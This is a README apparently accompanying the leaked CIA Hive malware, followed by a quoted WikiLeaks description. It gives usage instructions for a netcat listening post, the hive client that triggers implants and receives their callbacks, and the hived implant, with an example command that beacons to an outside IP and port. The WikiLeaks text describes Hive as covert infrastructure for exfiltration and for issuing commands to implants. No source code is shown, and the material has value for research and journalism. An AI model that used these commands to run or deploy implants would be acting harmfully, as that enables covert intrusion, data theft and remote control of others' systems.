README.md

//*************************************************************************
nc.sh - scripted netcat listener to emulate listening post until LP is set up

  Usage: ./nc.sh


//*************************************************************************
hclient - hive client that works with the Windows, Solaris, and Linux implants

  Usage:
  ./hclient-linux-dbg [-p port] 
  ./hclient-linux-dbg [-p port] [-t address] [-a address] [-P protocol] [-d delay] 

  Depending on options, client can send triggers, listen, or both
    [-p port]      - callback port
    [-t address]   - IP address of target
    [-a address]   - IP address of listener
    [-P protocol]  - trigger protocol
    [-d delay]     - (optional) delay between received trigger and callback
    [-h ]          - print this usage

  Examples:
   Coming soon!

//*************************************************************************
hived - hive implant

  Usage:
  ./hived-solaris-sparc-dbg  -a <ip address> -p <port> 

        -a - Beacon IP address to callback to
        -p - Beacon port
        -I - interface [required, only for Solaris, e.g. hme0, e1000g0]
        -d - Initial Beacon delay in milliseconds
        -i - Beacon interval in milliseconds
        -h - Print help

  Example:
  ./hived-solaris-sparc-dbg -a 10.3.2.76 -p 9999 -i 100000 -I hme0

From WikiLeaks:

Today, 9 November 2017, WikiLeaks publishes the source code and development logs to Hive, a major component of the CIA infrastructure to control its malware.

Hive solves a critical problem for the malware operators at the CIA. Even the most sophisticated malware implant on a target computer is useless if there is no way for it to communicate with its operators in a secure manner that does not draw attention. Using Hive, even if an implant is discovered on a target computer, attributing it to the CIA is difficult by just looking at the communication of the malware with other servers on the internet. Hive provides a covert communications platform for a whole range of CIA malware to send exfiltrated information to CIA servers and to receive new instructions from operators at the CIA.

Hive can serve multiple operations using multiple implants on target computers. Each operation anonymously registers at least one cover domain (e.g. "perfectly-boring-looking-domain.com") for its own use. The server running the domain website is rented from commercial hosting providers as a VPS (virtual private server) and its software is customized according to CIA specifications. These servers are the public-facing side of the CIA back-end infrastructure and act as a relay for HTTP(S) traffic over a VPN connection to a "hidden" CIA server called 'Blot'.

source: https://wikileaks.org/vault8/
